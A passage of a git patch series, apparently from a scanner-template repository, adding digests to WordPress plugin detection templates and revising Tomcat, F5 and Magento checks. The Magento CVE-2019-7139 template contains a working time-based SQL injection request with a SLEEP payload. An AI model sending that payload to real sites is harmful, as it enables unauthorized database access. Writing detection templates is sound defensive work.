4a0a004730450221009c1cfe7cf9820dc620b92af9af2f0a66b42dee598debc35ed85dae787edefa52022051c5bc2a778f857041ddb456c26d9cd318ad865925409d7952b59e95b2dfec82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..12189590b7 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049bfd826ba4faf874c3670db23e6aa7d99354e4428b54a2ee912c3f754e6c63302201154b72f12398aab00cac20ba54b0ea401bade6cf10199fe3a9a12146120ed8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..36cb435af3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f02176901958e85724e7f21a4bbbe62e363300d0b0b89344fd030d0154594a3022100bfeaea7efd2dd4bfd8847897193ce8ea250b0dbd8d7063347024d7cf9d41a013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..2a364356b9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220659276ec788c9487a2c64ee64f2ead887688302f8997525984701a24e45b58e70221008912164b3742d5aaeaf5461867c4c16da46e157e449ab7f51a769033b2060e36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..5b6dc5a1a8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bbebf48abbd2e42e42f6b14f99f1fa2311af2f1a7b4eb580eb271a959d26dd1e022100f60d6e84ce67a3370d2e8260887b00d7978310f824005765e51f704de7410d7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..edc58eeb76 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f1c782bcf01ac8306b14e1e0602932a77e2a842c8d8e7945133b3687dc924585022100dbd61246baf1b0b6cf4c673b944fb46b383c10eb9b89c2bf38f54726c16f75d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..9404df5732 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ca13d791d358e167bd5ebbd39f7fb26d9b54725c30ee8e9a97e879b79f6685002200e55304349eb39311b35e3ed3aa9c5e195ca13d40a15d0aaec6fe87d330e7834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..2d0d204897 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f1b1641acb02bb1ac54fcfaa82e4327d7898ddee99d25f979a9a1707e4aa7132022100b59a8d0d67ad0a889bb4b5ae3051c0bb6738dd79bd363527a6cd87dd0faed137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..96a438307c 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac585f6c21ff9c12d49ce2908b8490c1ce5b45b55b103373162e45344114d02b022100bfa75d0e6967250df0371b9333f6a0dc95fd74c165c2f9113b53e94c8b918726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..2797670063 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f393541905601a6fdf8fb888a6e58cb45a023c91f7274db3356ba75d2960ae1802210085604e0a51d086ecb957ca1f5181af9a98680f58f933ddff0f73b34ee65a2780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..42da67eb97 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8b373ad02218d85a296d310cec61d6906c7363b3482c278b928878a2eb388170221008d2375377c1879b63b25f4d99c91d1607bc1d535d77ff06ad27211cafabd40e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..4f14f4bf7f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d2dc699ceb77dd146d3c17a9fa9ce85c7a983e53d606aae7738b93fbb9eb5d0022100e5eb31688b3eb00b9575c728129042b11aa4cd0798b07890137202d96befdef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..b58673eb82 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1adbd6ced8dc57477f9d0cda6059f6efdcdc45a3397c1a27eedf5c7d258dc880220391244e7fca2ee94943810d5e13345bfbe986b6f3fd713d7efe1be64b4286f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..933c9bd067 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100abb27f05376d32e290acaff846ab8d3d470477247e519c787768131378dd5fef02205aac599452afeb876485b50601c30d840b916a5fc993f5aa1e7be9565c313938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..a46e6a2a3c 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fde325990b360b80f1bda80f1c52459652ccec2d9bb09cfaff1d5075749e1dc102201ae878327f801fe1372f8b88afa0bf6f97dcf5dda17cc037c6a1f6db6d719803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..85b91cf1c6 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061dfe63143e2ecdedb141c9e8b21f1319f3d8c61755ef1e4b379d775c87d8169022100ef5650ffc61390f8c331195f70695e8e0971b1d5e0d67e9a66f4765eed60f674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..6a0548b769 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100afb4ae544e8622516531113528113922c436bdeb4d6e053eea64f7bb84a1879b02201524b2d98c97f16b94ddb12bb4d260eb92cf5906db22075689f09af5c3492288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..ff9c58d679 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098827f65bc604db45535874637f804f95afa5c2ebb8603b451b3cadb71f9c1f9022100c3c523411e93996ac6e610778163537093d87f04b64229ea9fedcdb0df58f91d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..6e31039967 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220645809b198d0a4a4c0331fc242ce9ab0432fc57dae883fc6de2708dc3b0301c4022100d6743a9b918b67679ac313c45f3cdd3755da2d624c999b9d5b2b0226c1b729df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..456f936bb8 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022010a9c126f845781f0116f7a307cb9f63e2f5d746efe54d3811163f5255aa974d02201a536b3528d53af3724d7e2286e7081fe7bf347f418708b167e84894c33025a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..3f00286196 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c72597497e4c970a9c729158e7bc065d10c8b965b12d4901b94c84f0424e41102205bbf40a74d6cb6db9040aa4a22bd593b9530d9ef8c50ec22f5b4644119a2dd05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..6c60d8936b 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012c9166599bd1f6f90b16db030d2351b9f791d15e4c869c6283933a3bab3db40022014c365e801dff38af262094c9d847d969b5ce5411dff70865dc1028abc96f66a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..e775300b03 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201da9dc217962d5fc8f31377c45f9139d3a202fa5f3a7e8178a5ce46121c278ea022100b8375970cc28757a6a916036ac03ec67f49670e100ff3d052c934c494fdc6a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..ef3bc63110 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203834d4d98ac5c02dfadf14a03a3a7f5fdbc0531268d4ad2c0b5a283fce0cbbb002200134b0b9c8dc829ddea0816729ecf31c6d85bc78253ec827b27a5debe5995ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..6e8ff9895e 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009860c6b139b6597f19c969b1eec8def8d0b04d5717f9edd170a9cc74272fe36402202edffa60e66b4384c8a842ff265ca305e0747c896a3cb12e4de3dca81965f70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..d75aa76307 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cffaa264cc22fe096a5aee765286f9a34943580c398f9119539ab6adf87c1868022100c6f8674ab24a58293e92daa08aa14a089c2d9cbf37de250bbe776dc967c5d0a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..eb2be306c1 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef9a4ee523f01e1b342917fb709f27cc60cf90918017a5fdcf22d202ed34581c022037d76022afb3ef6ea183b567b040db7afad4b8966bb14048d335d72521a77474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..931ca05f93 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6f52d9ed1e542dc2ebf69b9c112735d053673eaa740ef6d01308b71ba73136e022100dcea4bbe996e781c08319a3216ad70715af33843710ce7f4d75ed1b4601d2e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..2419f0fcbf 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022063c6bc0c5c55c2cc4163a6648d9c4cf4645ed1449c8741558a224198c0ce653a02203686c3ef41322cb1a64d19d045ff2f2674bac4aff288b190729844a9115c2b57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..c39c219111 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c4d055de959ee8f41d9e0b1f762cea00b7e1cec6aaea38feba4ad4af080a614022100e31980bffcc177f3f61fe76d52f1df92c36480100a88ad8fb751b550bb9459b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..376329e19e 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204bf2b14b84df2b16b644a5443916a9ad285091f983cfa70e131124a21c1284e5022100a16775edf5a4ae2386a03f1fa7d8cd3d5e6cdc690dc8e3f095796a16956f0b17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..73c063f0f0 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220732261d8e5f6702e967cc1d2303b40dfdfa7c11fa98c7e11ab916f8d954c5b950220247df08db727eb68cc4587c499f3b1abf7c232dc7af5efe6ba5f61a2d0df376b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..de812ae324 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007506a6478c0b549e93d16029b6f111340f2ab0b2d190719e2e307ae4584dedc0220690940c6e322a4d16648e146748ba6a81d9f5b9246aea229090d3616ad3957af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..55ad22dbc1 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091810e81700df09f400cc9dd3b3ea9ac66777bc0ef384edd3ee950fdc1c8203a02204a8372203022d0f558c677904431c34c5330cc4ca9c519d9974f35e02f6a5f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..51b69d8510 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e929cda5bf584503b56e700d0bcfdefd85cef70c86868353d713e1ec2409f8bc0221009c9b39fdad38c47b371edfb106bba45286bcf2d0cf4591a2ddaa0f1a3bce26d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..3a7a649172 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca01061fcaae7bd13af04b5484e064fcae614183b19d9ace8f93f04b521d0cd9022100bc3c1461580bfadec445774bdb0a93960adbedb3effd2c269edddc08401f363d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..d2534595ef 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220016176d3b155113b504758c76032061b4d9f7e7446423326c860c3030b9d9ea6022100c0402697aab61e3c865a16dde777d503bbf8447fc72478f0007ddc001afe9c7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 59b735a1e07373a7b08b70eee9a5f35dd9fe64b6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 19 Jul 2024 12:57:48 +0530 Subject: [PATCH 1446/1841] Fix FN CVE-2019-7139.yaml --- http/cves/2019/CVE-2019-7139.yaml | 32 +++++++++++++++++++++---------- 1 file changed, 22 insertions(+), 10 deletions(-) diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index b04f253a0e..1049054121 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -6,12 +6,14 @@ info: severity: critical description: | An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage. - remediation: This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2. + remediation: | + This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2. reference: - https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap - https://www.ambionics.io/blog/magento-sqli - https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13 - https://github.com/koutto/jok3r-pocs + - https://nvd.nist.gov/vuln/detail/CVE-2019-7139 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -32,12 +34,25 @@ info: - http.component:"magento" tags: cve,cve2019,sqli,magento +flow: http(1) && http(2) + http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "text/x-magento-init")' + condition: and + internal: true + + - raw: - | @timeout: 20s GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1 @@ -56,18 +71,15 @@ http: - type: dsl name: time-based dsl: - - 'duration_2>=6' - - 'status_code_1 == 200' - - 'contains(body_1, "text/x-magento-init")' - - 'contains(content_type_2, "application/json")' + - 'duration_1>=6' + - 'contains(content_type_1, "application/json")' condition: and - type: dsl name: blind-based dsl: - - 'contains(body_1, "text/x-magento-init")' - - 'contains(content_type_3, "application/json") && contains(content_type_4, "application/json")' - - 'status_code_3 == 200 && status_code_4 == 400' - - 'len(body_3) == 2 && len(body_4) == 2' + - 'contains(content_type_2, "application/json") && contains(content_type_3, "application/json")' + - 'status_code_2 == 200 && status_code_3 == 400' + - 'len(body_2) == 2 && len(body_3) == 2' condition: and -# digest: 4a0a0047304502201a3e9663dc98735508040110a0f0778160d3bb3c76ea3246f73225c2bd7a22d8022100c3ad7ca4c44b23d865c8dbdd5ff2cc9d7a4172e04f03a427d9bbdcc18c2c5ef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a3e9663dc98735508040110a0f0778160d3bb3c76ea3246f73225c2bd7a22d8022100c3ad7ca4c44b23d865c8dbdd5ff2cc9d7a4172e04f03a427d9bbdcc18c2c5ef5:922c64590222798bb761d5b6d8e72950 From 53e7557e00cf6b2cf759ac94e56286259e5630a2 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Fri, 19 Jul 2024 10:04:20 +0200 Subject: [PATCH 1447/1841] Update and rename tomcat-exposed-docs.yaml to tomcat-exposed.yaml --- ...-exposed-docs.yaml => tomcat-exposed.yaml} | 31 +++++++++++-------- 1 file changed, 18 insertions(+), 13 deletions(-) rename http/exposed-panels/tomcat/{tomcat-exposed-docs.yaml => tomcat-exposed.yaml} (51%) diff --git a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml b/http/exposed-panels/tomcat/tomcat-exposed.yaml similarity index 51% rename from http/exposed-panels/tomcat/tomcat-exposed-docs.yaml rename to http/exposed-panels/tomcat/tomcat-exposed.yaml index 25b13ed8eb..ad06b0d670 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed.yaml @@ -1,13 +1,15 @@ -id: tomcat-exposed-docs +id: tomcat-exposed info: - name: Tomcat exposed docs - author: Podalirius + name: Tomcat exposed - Detect + author: Podalirius,righettod + description: Tomcat instance was detected. severity: info classification: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 + verified: true vendor: apache product: tomcat shodan-query: @@ -24,23 +26,26 @@ info: http: - method: GET path: + - '{{BaseURL}}/host-manager/html' + - '{{BaseURL}}/manager/status' + - '{{BaseURL}}/manager/html' - '{{BaseURL}}/docs/' + - '{{BaseURL}}/examples/' + + stop-at-first-match: true - matchers-condition: and matchers: - - type: word - words: - - 'Apache Tomcat' + - type: dsl + dsl: + - 'status_code == 200 || status_code == 401' + - 'contains_any(to_lower(body), "apache tomcat", "tomcat-users.xml")' condition: and - - type: status - status: - - 200 - extractors: - type: regex part: body group: 1 regex: - - '
    [ \n\t]*(Version[ \n\t]*[^\n\t<]+)[ \n\t]*Apache\s+Tomcat/([0-9.]+)' From 57a2318229a9f068c1c4642a1fbe88099f9f0065 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Fri, 19 Jul 2024 10:31:10 +0200 Subject: [PATCH 1448/1841] Update f5-admin-interface.yaml --- http/exposed-panels/f5-admin-interface.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index 6a139f115e..0e2f2d217e 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -2,7 +2,7 @@ id: f5-admin-interface info: name: F5 Admin Interface - Detect - author: drewvravick + author: drewvravick,righettod severity: info description: | Detects F5 Admin Interfaces. @@ -32,4 +32,10 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220239c199e589da94df6af86a7dffb03da221623c57a12f35d8a3d5e095891be9a022100c73b0b439dc609b6d8c35ceeaf09fb4ce45039fb8b3bc896c880fdcc0c046218:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Copyright\s+([0-9\-]+),' From 1e6fb1a2cf05c730c372511df8c232b28c9135ce Mon Sep 